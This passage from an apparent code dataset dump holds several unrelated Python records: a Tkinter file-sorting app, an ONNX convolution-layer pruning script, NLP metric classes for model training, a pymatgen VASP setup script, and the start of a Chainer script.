text=\"\", image=self.audio_icon, compound=TOP, font=(\"times 
new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_audio.place(x=263.32, y=60, width=230, height=200)\r\n\r\n self.lbl_total_video = Label(Frame1, bd=2, relief=RAISED, pady=10, text=\"\", image=self.video_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_video.place(x=509.98, y=60, width=230, height=200)\r\n\r\n self.lbl_total_docum = Label(Frame1, bd=2, relief=RAISED, text=\"\", image=self.docum_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_docum.place(x=756.64, y=60, width=230, height=200)\r\n\r\n self.lbl_total_other = Label(Frame1, bd=2, relief=RAISED, text=\"\", image=self.other_icon, compound=TOP, font=(\"times new roman\", 17, \"bold\"), bg=\"#008EA4\", fg=\"white\")\r\n self.lbl_total_other.place(x=1003.3, y=60, width=230, height=200)\r\n\r\n\r\n #======Section 4=======\r\n #======All Image icons=======\r\n lbl_status=Label(self.root, text=\"STATUS\", font=(\"times new roman\", 20), bg=\"white\").place(x=50, y=620)\r\n self.lbl_total=Label(self.root, text=\"\", font=(\"times new roman\", 17), bg=\"white\", fg=\"Blue\")\r\n self.lbl_total.place(x=300, y=620)\r\n self.lbl_moved=Label(self.root, text=\"\", font=(\"times new roman\", 17), bg=\"white\", fg=\"Green\")\r\n self.lbl_moved.place(x=500, y=620)\r\n self.lbl_left=Label(self.root, text=\"\", font=(\"times new roman\", 17), bg=\"white\", fg =\"red\")\r\n self.lbl_left.place(x=700, y=620)\r\n \r\n self.btn_clear = Button(self.root, text=\"CLEAR\", state=NORMAL, command=self.clear_fxn, bd=2, relief=RAISED, font=(\"times new roman\", 15, \"bold\"), cursor=\"hand2\", bg=\"#607d8b\", fg=\"white\", activebackground=\"#607d8b\", activeforeground=\"white\")\r\n self.btn_clear.place(x=880, y=615, height=40, width=200)\r\n self.btn_start = Button(self.root, text=\"START\", state=DISABLED, command=self.start_fxn, bd=2, relief=RAISED, font=(\"times new roman\", 15, \"bold\"), cursor=\"hand2\", bg=\"#ff5722\", fg=\"white\", activebackground=\"#ff5722\", activeforeground=\"white\")\r\n self.btn_start.place(x=1100, y=615, height=40, width=200)\r\n\r\n \r\n \r\n \r\n def total_count(self):\r\n images=0\r\n audios=0\r\n videos=0\r\n documents=0\r\n others=0\r\n self.ttl=0\r\n \r\n for i in self.all_files:\r\n if os.path.isfile(os.path.join(self.directory,i))==True: #can also use (self.directory+\"\\\\\"+i) to join the path\r\n self.ttl+=1\r\n ext = \".\"+i.split(\".\")[-1]\r\n for folder_name in self.folders.items(): \r\n # print(folder_name)\r\n if ext.lower() in folder_name[1] and folder_name[0]==\"images\":\r\n images+=1\r\n elif ext.lower() in folder_name[1] and folder_name[0]==\"audios\":\r\n audios+=1\r\n elif ext.lower() in folder_name[1] and folder_name[0]==\"videos\":\r\n videos+=1\r\n elif ext.lower() in folder_name[1] and folder_name[0]==\"documents\":\r\n documents+=1\r\n \r\n others = self.ttl-(images+audios+videos+documents)\r\n self.lbl_total_image.config(text=\"Total Images\\n\"+str(images))\r\n self.lbl_total_audio.config(text=\"Total Audios\\n\"+str(audios))\r\n self.lbl_total_video.config(text=\"Total Videos\\n\"+str(videos))\r\n self.lbl_total_docum.config(text=\"Total Documents\\n\"+str(documents))\r\n self.lbl_total_other.config(text=\"Others\\n\"+str(others))\r\n self.lbl_total_files.config(text=\"Total Files: \"+str(self.ttl))\r\n\r\n self.lbl_total.config(text=\"TOTAL : \"+str(self.ttl))\r\n self.lbl_moved.config(text=\"MOVED : \"+str(0))\r\n 
self.lbl_left.config(text=\"LEFT : \"+str(self.ttl))\r\n\r\n \r\n \r\n\r\n def browse(self):\r\n op=filedialog.askdirectory(title=\"Select Folder for Arranging\")\r\n if op!=None:\r\n self.var_foldername.set(str(op))\r\n self.directory = self.var_foldername.get()\r\n self.other_name = \"others\"\r\n self.all_files = os.listdir(self.directory)\r\n self.rename_folder()\r\n #os.listdir will put all the files and folders present inside the given self.directory into a list\r\n #os.path.isfile() returns True only for files, not folders\r\n\r\n total_files = len(self.all_files)\r\n self.total_count()\r\n self.btn_start.config(state=NORMAL)\r\n\r\n def clear_fxn(self):\r\n self.btn_start.config(state=DISABLED)\r\n self.var_foldername.set(\"\")\r\n self.lbl_total.config(text=\"\")\r\n self.lbl_moved.config(text=\"\")\r\n self.lbl_left.config(text=\"\")\r\n \r\n self.lbl_total_image.config(text=\"\")\r\n self.lbl_total_audio.config(text=\"\")\r\n self.lbl_total_video.config(text=\"\")\r\n self.lbl_total_docum.config(text=\"\")\r\n self.lbl_total_other.config(text=\"\")\r\n self.lbl_total_files.config(text=\"Total Files: 0\")\r\n \r\n\r\n def start_fxn(self):\r\n # main code\r\n if self.var_foldername.get()!=\"\":\r\n self.btn_clear.config(state=DISABLED)\r\n c=1\r\n for i in self.all_files:\r\n if os.path.isfile(os.path.join(self.directory,i))==True: #can also use (self.directory+\"\\\\\"+i) to join the path\r\n ex = i.split(\".\") #splitting the file name into name and extension\r\n self.create_move(ex[-1],i) # passing extension and full name\r\n self.lbl_total.config(text=\"TOTAL : \"+str(self.ttl))\r\n self.lbl_moved.config(text=\"MOVED : \"+str(c))\r\n self.lbl_left.config(text=\"LEFT : \"+str(self.ttl - c))\r\n\r\n \r\n self.lbl_total.update()\r\n self.lbl_moved.update()\r\n self.lbl_left.update()\r\n \r\n \r\n #print(f\"Total files: {total_files} | Done: {count} | Left: {total_files - c}\")\r\n c+=1\r\n\r\n messagebox.showinfo(\"Success\", \"All files have been moved successfully\")\r\n self.btn_start.config(state=DISABLED)\r\n self.btn_clear.config(state=NORMAL)\r\n else:\r\n messagebox.showinfo(\"Error\",\"Please select a folder\")\r\n \r\n\r\n\r\n\r\n def rename_folder(self):\r\n for folder in os.listdir(self.directory): #list all the files present inside the folder\r\n if os.path.isdir(os.path.join(self.directory,folder))==True: # true if a folder is found, isdir() returns a boolean for the given path\r\n # if folder.lower() in self.folders:\r\n os.rename(os.path.join(self.directory,folder), os.path.join(self.directory, folder.lower()))\r\n\r\n\r\n\r\n def create_move(self, ext, file_name): #this function moves the files to the designated folder\r\n for folder_name in self.folders:\r\n flag=False\r\n if \".\"+ext in self.folders[folder_name]:\r\n if folder_name not in os.listdir(self.directory):\r\n os.mkdir(os.path.join(self.directory, folder_name)) #mkdir() used to make a directory at the specified location\r\n shutil.move(os.path.join(self.directory,file_name), os.path.join(self.directory,folder_name)) \r\n #shutil.move(src, dst) used to move a file to the specified location\r\n\r\n flag=True\r\n break\r\n\r\n if flag != True: \r\n # rename_other_folder()\r\n if self.other_name not in os.listdir(self.directory):\r\n os.mkdir(os.path.join(self.directory, self.other_name))\r\n shutil.move(os.path.join(self.directory,file_name), os.path.join(self.directory,self.other_name))\r\n\r\n\r\nroot = Tk()\r\nobj = 
Sorting_App(root)\r\nroot.iconbitmap(\"E:\\\\PythonProject\\\\Arrange_File_Application\\\\res\\\\appicon.ico\")\r\nroot.mainloop()","repo_name":"Vivek-Maurya/File-Arrangement-Application","sub_path":"arrange_app.py","file_name":"arrange_app.py","file_ext":"py","file_size_in_byte":12607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34385967304","text":"\"\"\"\n Deeplite coding challenge: onnx_pruner.\n The main goal of this coding challenge is to implement a method to prune conv layers of a given onnx model.\n\n Details:\n Take an onnx model and randomly remove x percent (x is a given number between 0 to 100) of conv layers in such\n a way that the new onnx model is still valid and you can train/test it.\n\n ** First select the random conv layers for pruning then remove them one by one (sequentially)\n ** You may need to adjust the input/output of remaining layers after each layer pruning\n ** you can test your code on vgg19\n ** Can you extend your work to support models with residual connections such as resnet family?\n ** We recommend using mxnet as the AI framework for this coding challenge due to its native support of onnx\n https://mxnet.incubator.apache.org/versions/master/api/python/contrib/onnx.html\n\"\"\"\n\nfrom collections import namedtuple\n\nimport numpy as np\nimport cv2\n\nimport torch\nimport torchvision\n\nimport mxnet as mx\nimport mxnet.contrib.onnx as onnx_mxnet\n\nimport onnx\nfrom onnx import shape_inference, numpy_helper, helper\n\n\ndef extract_linked_oneop_node_names(node_name_map, node_name):\n linked_node_names = []\n for k in node_name_map.keys():\n # Expand this exclusion list with 1-to-1 ops found at https://github.com/onnx/onnx/blob/master/docs/Operators.md\n if node_name in node_name_map[k].input and node_name_map[k].op_type in ['Relu', 'Dropout', 'MaxPool']:\n linked_node_names.append(k)\n linked_node_names += extract_linked_oneop_node_names(node_name_map, k)\n return linked_node_names\n\n\ndef extract_next_ingraph(node_name_map, node_name, rejected_node_names):\n if node_name not in rejected_node_names:\n return node_name\n for inp_name in node_name_map[node_name].input:\n if inp_name in node_name_map or inp_name == 'image_input':\n return extract_next_ingraph(node_name_map, inp_name, rejected_node_names)\n return -1\n\n\ndef prune(model, x):\n \"\"\"\n :param model: onnx model\n :param x: pruning ratio (0 to 100)\n :return: pruned model\n \"\"\"\n shape_inferred_model = shape_inference.infer_shapes(model)\n shape_map = {}\n for i in range(len(shape_inferred_model.graph.value_info)):\n dims = [d.dim_value for d in shape_inferred_model.graph.value_info[i].type.tensor_type.shape.dim]\n shape_map[shape_inferred_model.graph.value_info[i].name] = dims\n num_nodes = len(model.graph.node)\n all_conv_node_names = []\n plural_nodes = []\n node_name_map = {}\n param_name_map = {}\n input_name_map = {}\n for i in range(num_nodes):\n model.graph.node[i].name = model.graph.node[i].output[0]\n node_name_map[model.graph.node[i].name] = model.graph.node[i]\n if len(model.graph.node[i].output) > 1:\n plural_nodes.append(model.graph.node[i])\n if model.graph.node[i].op_type == 'Conv':\n all_conv_node_names.append(model.graph.node[i].name)\n all_conv_node_names = np.array(all_conv_node_names)\n\n for param in model.graph.initializer:\n param_name_map[param.name] = param\n\n for inp in model.graph.input:\n input_name_map[inp.name] = inp\n input_shape = [d.dim_value for d in 
input_name_map['image_input'].type.tensor_type.shape.dim]\n shape_map['image_input'] = input_shape\n all_conv_node_names_shuffled = list(all_conv_node_names.copy())\n np.random.shuffle(all_conv_node_names_shuffled)\n selected_conv_node_count = int(((100 - x) / 100.) * len(all_conv_node_names_shuffled))\n rejected_node_names = all_conv_node_names_shuffled[selected_conv_node_count:]\n for name in rejected_node_names: # finding full sets of nodes qualified for removal\n linked_oneop_node_names = extract_linked_oneop_node_names(node_name_map, name)\n rejected_node_names += linked_oneop_node_names\n new_nn_nodes = []\n new_nn_input_names = []\n for name in node_name_map.keys(): # identifying required input nodes in the new neural net\n if name in rejected_node_names:\n continue\n else:\n new_nn_nodes.append(node_name_map[name])\n input_names = node_name_map[name].input\n for input_name in input_names:\n if input_name in input_name_map:\n new_nn_input_names.append(input_name)\n new_nn_input_names = list(set(new_nn_input_names))\n new_nn_inputs = [input_name_map[name] for name in new_nn_input_names]\n new_nn_params = [param_name_map[name] for name in new_nn_input_names if name != model.graph.input[0].name]\n\n for i in range(len(new_nn_nodes)): # rewiring the neural net to fill gaps created by missing layers\n node = new_nn_nodes[i]\n if len(node.input) == 0:\n continue\n for j in range(len(node.input)):\n inp_name = node.input[j]\n if inp_name in rejected_node_names:\n ingraph_input_node_name = extract_next_ingraph(node_name_map, inp_name, rejected_node_names)\n node.input[j] = ingraph_input_node_name\n\n if node.op_type == 'Conv':\n input_shape = shape_map[ingraph_input_node_name]\n output_shape = shape_map[new_nn_nodes[i].name]\n in_channels = input_shape[1]\n out_channels = output_shape[1]\n for weight_name in node.input:\n if weight_name in param_name_map and len(param_name_map[weight_name].dims) == 4:\n conv_param_name = weight_name\n conv_param = param_name_map[conv_param_name]\n conv_input = input_name_map[conv_param_name]\n conv_filter_dims = conv_param.dims # in_c, out_c, kernel_height, kernel_width\n\n # re-align the conv filter through kernel interpolation to work with the new dimensions\n if conv_filter_dims[0] != in_channels:\n # internally implemented as -\n # np.frombuffer(conv_param.raw_data, dtype=np.float32).reshape(conv_param.dims)\n filter_values = numpy_helper.to_array(conv_param)\n\n fmap_size = conv_filter_dims[0]\n num_fmaps = conv_filter_dims[1]\n new_filter = np.zeros([in_channels, out_channels, conv_filter_dims[2], conv_filter_dims[3]])\n for fmap_idx in range(num_fmaps):\n fmap = filter_values[:, fmap_idx, :, :]\n new_fmap = np.zeros([in_channels, conv_filter_dims[2], conv_filter_dims[3]])\n for row_idx in range(conv_filter_dims[2]):\n fmap_slice = fmap[:, row_idx, :]\n\n # opencv resize does filter kernel interpolation and accepts new dims as width, height\n fmap_slice_interpolated = cv2.resize(fmap_slice, (fmap_slice.shape[1], in_channels))\n\n new_fmap[:, row_idx, :] = fmap_slice_interpolated\n new_filter[:, fmap_idx, :, :] = new_fmap\n conv_param.raw_data = new_filter.tobytes()\n conv_param.dims[0] = in_channels\n conv_input.type.tensor_type.shape.dim[0].dim_value = in_channels\n\n new_nn_graph = helper.make_graph(\n new_nn_nodes,\n \"ConvNet-trimmed-tmp\",\n new_nn_inputs,\n model.graph.output,\n new_nn_params\n )\n new_nn_model = helper.make_model(new_nn_graph)\n onnx.checker.check_model(new_nn_model)\n onnx.save_model(new_nn_model, 
'vgg19_pruned-tmp.onnx')\n\n shape_inferred_model = shape_inference.infer_shapes(new_nn_model)\n new_shape_map = {}\n for i in range(len(shape_inferred_model.graph.value_info)):\n dims = [d.dim_value for d in shape_inferred_model.graph.value_info[i].type.tensor_type.shape.dim]\n new_shape_map[shape_inferred_model.graph.value_info[i].name] = dims\n input_shape = [d.dim_value for d in input_name_map['image_input'].type.tensor_type.shape.dim]\n new_shape_map['image_input'] = input_shape\n\n dense_nodes = [node for node in new_nn_model.graph.node if node.op_type == 'Gemm']\n dense_node = dense_nodes[0]\n inp_node = node_name_map[dense_node.input[0]]\n while inp_node.op_type not in ['Conv', 'MaxPool']:\n inp_node = node_name_map[inp_node.input[0]]\n\n pre_dense_shape = new_shape_map[inp_node.name]\n init_dense_layer_params = numpy_helper.to_array(param_name_map[dense_node.input[1]])\n new_dim_input_neurons_dense = np.prod(pre_dense_shape[1:])\n new_dense_layer_params = cv2.resize(init_dense_layer_params, (new_dim_input_neurons_dense,\n init_dense_layer_params.shape[0]))\n param_name_map[dense_node.input[1]].raw_data = new_dense_layer_params.tobytes()\n param_name_map[dense_node.input[1]].dims[1] = new_dim_input_neurons_dense\n input_name_map[dense_node.input[1]].type.tensor_type.shape.dim[1].dim_value = new_dim_input_neurons_dense\n\n # Random conv layer removal sometimes causes the conv-layer just before the dense layer to output a large\n # volume (spatially). This causes the number of params in the dense layer to blow up, significantly increasing\n # nn size.\n\n final_nn_graph = helper.make_graph(\n new_nn_nodes,\n \"ConvNet-trimmed\",\n new_nn_inputs,\n model.graph.output,\n new_nn_params\n )\n final_nn_model = helper.make_model(final_nn_graph)\n\n onnx.checker.check_model(final_nn_model) # TODO: Sort nodes topologically, else fails when shallowest conv layer is removed\n\n return final_nn_model\n\n\ndef logit2class_mapper():\n with open('imagenet_classes.txt', 'r') as f:\n class_keys = f.readlines()\n class_keys = [cls.strip() for cls in class_keys]\n with open('imagenet_synsets.txt', 'r') as f:\n data = f.readlines()\n key2label_map = {d.strip().split(' ')[0]: ' '.join(d.strip().split(' ')[1:]) for d in data}\n logitmap = [key2label_map[k] for k in class_keys]\n return logitmap\n\n\nif __name__ == '__main__':\n\n logitmap = logit2class_mapper()\n im = cv2.resize(cv2.imread('car.jpg'), (224, 224))[:, :, [2, 1, 0]]\n im = (np.rollaxis(im, 2, 0) / 255.).astype(np.float32)\n im = np.expand_dims(im, 0)\n\n # ----------------- CREATION OF ONNX MODEL FROM PRETRAINED PYTORCH MODEL ----------------- #\n # model = torchvision.models.vgg19(pretrained=True).cuda()\n # dummy_input = torch.from_numpy(im).cuda()\n # dummy_output = model.forward(dummy_input).cpu().detach().numpy()[0]\n # out_label = logitmap[dummy_output.argmax()]\n # print('PyTorch classified label -', out_label)\n # input_names = ['image_input']\n # output_names = ['logit_outs']\n # torch.onnx.export(model, dummy_input, \"vgg19.onnx\", verbose=True, input_names=input_names,\n # output_names=output_names, export_params=True)\n # ----------------- CREATION OF ONNX MODEL FROM PRETRAINED PYTORCH MODEL ----------------- #\n\n # -------------------------------- OPERATING ON ONNX MODEL -------------------------------- #\n # model = onnx.load('vgg19.onnx')\n # onnx.checker.check_model(model)\n # print('Original model -')\n # print(helper.printable_graph(model.graph))\n #\n # pruned_model = prune(model, 20)\n # print('Pruned model -')\n # 
print(helper.printable_graph(pruned_model.graph))\n # onnx.save_model(pruned_model, 'vgg19_pruned.onnx')\n # -------------------------------- OPERATING ON ONNX MODEL -------------------------------- #\n\n # ----------------- LOADING PRUNED ONNX MODEL AND VALIDATION IN MXNET ----------------- #\n # KeyError: 'concat0' -> https://github.com/apache/incubator-mxnet/issues/13949 (open GitHub issue)\n # modified mxnet source code at -\n # https://github.com/apache/incubator-mxnet/blob/master/python/mxnet/contrib/onnx/onnx2mx/_op_translations.py#L462\n # to accommodate the missing shape of the resulting tensor after reshaping.\n # Source code changed -\n # reshape_shape = list(proto_obj._params[inputs[1].name].asnumpy()) (previous)\n # reshape_shape = [1, ] (replaced with this, hacky solution for now)\n # Ideally this should be a flatten operator but PyTorch exports it as a reshape :(\n sym, arg, aux = onnx_mxnet.import_model('vgg19_pruned.onnx')\n data_names = [graph_input for graph_input in sym.list_inputs()\n if graph_input not in arg and graph_input not in aux]\n param_names_args = [graph_input for graph_input in arg if graph_input not in data_names]\n param_names_aux = [graph_input for graph_input in aux if graph_input not in data_names]\n param_shapes_args = [arg[n].shape for n in param_names_args]\n param_shapes_aux = [arg[n].shape for n in param_names_aux]\n\n param_names_all = param_names_args + param_names_aux\n param_shapes_all = param_shapes_args + param_shapes_aux\n\n all_data_names = [data_names[0]] + param_names_all\n all_data_shapes = [im.shape] + param_shapes_all\n\n all_data_shape_list = list(zip(all_data_names, all_data_shapes))\n\n # mod = mx.mod.Module(symbol=sym, data_names=all_data_names, context=mx.gpu(), label_names=None)\n mod = mx.mod.Module(symbol=sym, data_names=[data_names[0]], context=mx.gpu(), label_names=None)\n\n # mod.bind(for_training=False, data_shapes=all_data_shape_list, label_shapes=None)\n mod.bind(for_training=True, data_shapes=[(data_names[0], im.shape)], label_shapes=None)\n\n mod.set_params(arg_params=arg, aux_params=aux, allow_missing=True, allow_extra=True)\n\n Batch = namedtuple('Batch', ['data'])\n mod.forward(Batch([mx.nd.array(im)]))\n out_logits = mod.get_outputs()[0].asnumpy()[0].argmax()\n out_label = logitmap[out_logits]\n print('MXnet classified label from converted ONNX model -', out_label)\n\n k = 0\n # ----------------- LOADING PRUNED ONNX MODEL AND VALIDATION IN MXNET ----------------- #","repo_name":"ironhide23586/deeplite-challenge","sub_path":"onnx_pruning/onnx_pruner.py","file_name":"onnx_pruner.py","file_ext":"py","file_size_in_byte":14084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72638594408","text":"from typing import Mapping, Union\n\nimport torch\nfrom torch import Tensor\nfrom torchmetrics import Metric\n\nfrom composer.loss import soft_cross_entropy\n\n__all__ = [\"Perplexity\", \"BinaryF1Score\", \"HFCrossEntropy\", \"LanguageCrossEntropy\", \"MaskedAccuracy\"]\n\n\nclass MaskedAccuracy(Metric):\n \"\"\"Computes accuracy with support for masked indices.\n\n Adds metric state variables:\n correct (float): The number of instances where the prediction matched the target.\n total (float): The number of total instances that were predicted.\n\n Args:\n ignore_index (int): The class index to ignore.\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. 
Default: ``False``.\n \"\"\"\n\n def __init__(self, ignore_index: int, dist_sync_on_step: bool = False):\n # state from multiple processes\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n self.ignore_index = ignore_index\n\n self.add_state(\"correct\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n self.add_state(\"total\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, preds: torch.Tensor, target: torch.Tensor):\n # predictions is a batch x num_classes tensor, take the argmax to get class indices\n preds = torch.argmax(preds, dim=-1)\n assert preds.shape == target.shape\n\n # mask out the padded indices\n mask = (target != self.ignore_index)\n masked_target = target[mask]\n masked_preds = preds[mask]\n\n self.correct += torch.sum(masked_preds == masked_target)\n self.total += mask.sum()\n\n def compute(self):\n assert isinstance(self.correct, Tensor)\n assert isinstance(self.total, Tensor)\n return self.correct.float() / self.total\n\n\nclass LanguageCrossEntropy(Metric):\n \"\"\"Torchmetric that computes cross entropy on language modeling outputs.\n\n Adds metric state variables:\n sum_loss (float): The sum of the per-example loss in the batch.\n total_items (float): The number of batches to average across.\n\n Args:\n vocab_size (int): The size of the tokenizer vocabulary.\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. Default: ``False``.\n ignore_index (int, optional): The class index to ignore. Default: ``-100``.\n \"\"\"\n\n def __init__(self, vocab_size: int, dist_sync_on_step=False, ignore_index: int = -100):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n\n self.vocab_size = vocab_size\n self.ignore_index = ignore_index\n self.loss_fn = torch.nn.CrossEntropyLoss(ignore_index=ignore_index, reduction=\"sum\")\n self.add_state(\"sum_loss\", default=torch.tensor(0.), dist_reduce_fx=\"sum\")\n self.add_state(\"total_items\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, output: Union[Mapping, Tensor], target: Tensor) -> None:\n \"\"\"Updates the internal state with results from a new batch.\n\n Args:\n output (Mapping): The output from the model, which must contain\n either the Tensor or a Mapping type that contains the loss or model logits.\n target (~torch.Tensor): A Tensor of ground-truth values to compare against.\n \"\"\"\n\n assert isinstance(output, Tensor)\n output = output.view(-1, self.vocab_size)\n target = target.view(-1)\n losses = self.loss_fn(output, target)\n\n total_items = (target != self.ignore_index).sum()\n self.total_items += total_items #type: ignore (third-party)\n\n # accumulate loss over all batches\n self.sum_loss += losses\n\n def compute(self) -> Tensor:\n \"\"\"Aggregate the state over all processes to compute the metric.\n\n Returns:\n loss: The loss averaged across all batches as a :class:`~torch.Tensor`.\n \"\"\"\n # Return average loss over entire dataset\n return self.sum_loss / self.total_items #type: ignore (third-party)\n\n\nclass BinaryF1Score(Metric):\n \"\"\"Implements the F1 score for binary classification tasks.\n\n Adds metric state variables:\n true_positive (float): A counter of how many items were correctly classified as positives.\n false_positive (float): A counter of how many items were incorrectly classified as positives.\n false_negative (float): A counter of how many items were incorrectly classified as negatives.\n\n Args:\n dist_sync_on_step (bool, optional): 
Synchronize metric state across processes at\n each forward() before returning the value at the step. Default: ``False``.\n \"\"\"\n\n def __init__(self, dist_sync_on_step: bool = False):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n\n self.add_state(\"true_positive\", default=torch.tensor(0.), dist_reduce_fx=\"sum\")\n self.add_state(\"false_positive\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n self.add_state(\"false_negative\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, output: Tensor, target: Tensor) -> None:\n \"\"\"Updates the internal state with results from a new batch.\n\n Args:\n output (Mapping): The output from the model, which must contain\n either the Tensor or a Mapping type that contains the loss or model logits.\n target (~torch.Tensor): A Tensor of ground-truth values to compare against.\n \"\"\"\n predictions = torch.argmax(output, dim=1)\n self.true_positive += predictions[(target == 1)].sum()\n # predicted 0 where the target is 1 -> false negative\n self.false_negative += (predictions[(target == 1)] == 0).sum()\n # predicted 1 where the target is 0 -> false positive\n self.false_positive += (predictions[(target == 0)] == 1).sum()\n\n def compute(self) -> Tensor:\n \"\"\"Aggregate the state over all processes to compute the metric.\n\n Returns:\n f1: The binary F1 score as a :class:`~torch.Tensor`.\n \"\"\"\n assert isinstance(self.true_positive, Tensor)\n assert isinstance(self.false_positive, Tensor)\n assert isinstance(self.false_negative, Tensor)\n f1 = (self.true_positive) / (self.true_positive + (0.5 * (self.false_negative + self.false_positive)))\n return f1\n\n\nclass HFCrossEntropy(Metric):\n \"\"\"Hugging Face compatible cross entropy loss.\n\n Adds metric state variables:\n sum_loss (float): The sum of the per-example loss in the batch.\n total_batches (float): The number of batches to average across.\n\n Args:\n dist_sync_on_step (bool, optional): Synchronize metric state across processes at\n each forward() before returning the value at the step. 
Default: ``False``\n \"\"\"\n\n def __init__(self, dist_sync_on_step=False):\n super().__init__(dist_sync_on_step=dist_sync_on_step)\n\n self.add_state(\"sum_loss\", default=torch.tensor(0.), dist_reduce_fx=\"sum\")\n self.add_state(\"total_batches\", default=torch.tensor(0), dist_reduce_fx=\"sum\")\n\n def update(self, output: Union[Mapping, Tensor], target: Tensor) -> None:\n \"\"\"Updates the internal state with results from a new batch.\n\n Args:\n output (Mapping): The output from the model, which must contain\n either the Tensor or a Mapping type that contains the loss or model logits.\n target (~torch.Tensor): A Tensor of ground-truth values to compare against.\n \"\"\"\n\n # if logit modification algorithms aren't on, we take the loss directly from the model output\n if isinstance(output, Mapping) and 'loss' in output:\n loss = output['loss']\n else:\n if isinstance(output, Mapping):\n logits = output['logits']\n # recompute the loss on our own\n elif isinstance(output, Tensor):\n logits = output\n else:\n raise Exception(f\"Type {type(output)} for the output is unsupported.\")\n\n loss = soft_cross_entropy(logits, target)\n\n # accumulate loss over all batches\n self.sum_loss += loss\n\n self.total_batches += 1 #type: ignore (third-party)\n\n def compute(self) -> Tensor:\n \"\"\"Aggregate the state over all processes to compute the metric.\n\n Returns:\n loss: The loss averaged across all batches as a :class:`~torch.Tensor`.\n \"\"\"\n # Return average loss over entire dataset\n return self.sum_loss / self.total_batches #type: ignore (third-party)\n\n\nclass Perplexity(HFCrossEntropy):\n \"\"\"Subclasses :class:`~composer.models.nlp_metrics.HFLanguageCrossEntropyLoss` to implement perplexity.\n\n If an algorithm modifies the loss function and it is no longer directly provided in the output, then this could be\n expensive because it'll compute the loss twice.\n \"\"\"\n\n def compute(self) -> Tensor:\n \"\"\"Returns torch.exp() of the LanguageCrossEntropyLoss.\"\"\"\n avg_loss = super().compute()\n return torch.exp(avg_loss)\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/metrics/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":9060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"35993360665","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a script to set up relaxations using Materials Project parameters.\n\"\"\"\n\nimport argparse\nfrom pymatgen import Structure\nfrom pymatgen.io.vasp.sets import MPRelaxSet\n\ndef setup_vasp(pmg_s, n_e):\n \"\"\"\n :param pmg_s: Pymatgen Structure object\n :param n_e: Number of electrons to add\n :return: A VaspSet\n \"\"\"\n nelect = MPRelaxSet(pmg_s).nelect\n if n_e > 0:\n print(\"###################################\")\n print(\"# BE CAREFUL, YOU ADDED ELECTRONS #\")\n print(\"###################################\")\n nelect += n_e\n uis = {\n 'NELECT': nelect,\n # 'IVDW': 11\n }\n\n return MPRelaxSet(pmg_s, user_incar_settings=uis)\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n # Process command line arguments\n psr = argparse.ArgumentParser(description=\"MP relax setup script\")\n psr.add_argument('-s', type=str, default=\"./POSCAR\", help='Structure file')\n psr.add_argument('-ne', type=int, default=0, help='# of electrons to add')\n psr.add_argument('-fn', type=str, default=None, help='Folder name for run')\n args = psr.parse_args()\n\n # Get the structure object\n init_s = Structure.from_file(args.s)\n\n # 
{"seq_id":"35993360665","text":"#!/usr/local/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis is a script to set up relaxations using Materials Project parameters.\n\"\"\"\n\nimport argparse\nfrom pymatgen import Structure\nfrom pymatgen.io.vasp.sets import MPRelaxSet\n\ndef setup_vasp(pmg_s, n_e):\n \"\"\"\n :param pmg_s: Pymatgen Structure object\n :param n_e: Number of electrons to add\n :return: A VaspSet\n \"\"\"\n nelect = MPRelaxSet(pmg_s).nelect\n if n_e > 0:\n print(\"###################################\")\n print(\"# BE CAREFUL, YOU ADDED ELECTRONS #\")\n print(\"###################################\")\n nelect += n_e\n uis = {\n 'NELECT': nelect,\n # 'IVDW': 11\n }\n\n return MPRelaxSet(pmg_s, user_incar_settings=uis)\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n # Process command line arguments\n psr = argparse.ArgumentParser(description=\"MP relax setup script\")\n psr.add_argument('-s', type=str, default=\"./POSCAR\", help='Structure file')\n psr.add_argument('-ne', type=int, default=0, help='# of electrons to add')\n psr.add_argument('-fn', type=str, default=None, help='Folder name for run')\n args = psr.parse_args()\n\n # Get the structure object\n init_s = Structure.from_file(args.s)\n\n # Get the folder name\n foldername = \"./\"\n if args.fn is None:\n foldername += str(init_s.composition).replace(\" \", \"\") + \"_relax\"\n else:\n foldername += args.fn\n\n mp_set = setup_vasp(init_s, args.ne)\n mp_set.write_input(foldername)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dchannah/materials_mining","sub_path":"basic_setup/setup_mp_relax.py","file_name":"setup_mp_relax.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} {"seq_id":"16183514761","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 12 18:00:35 2017\r\n\r\n@author: Stefano\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport chainer\r\nfrom chainer import report, optimizers, Link, Chain\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\nfrom chainer.datasets import TupleDataset\r\nfrom chainer import cuda, Function, gradient_check, report, training, utils, Variable\r\nfrom chainer 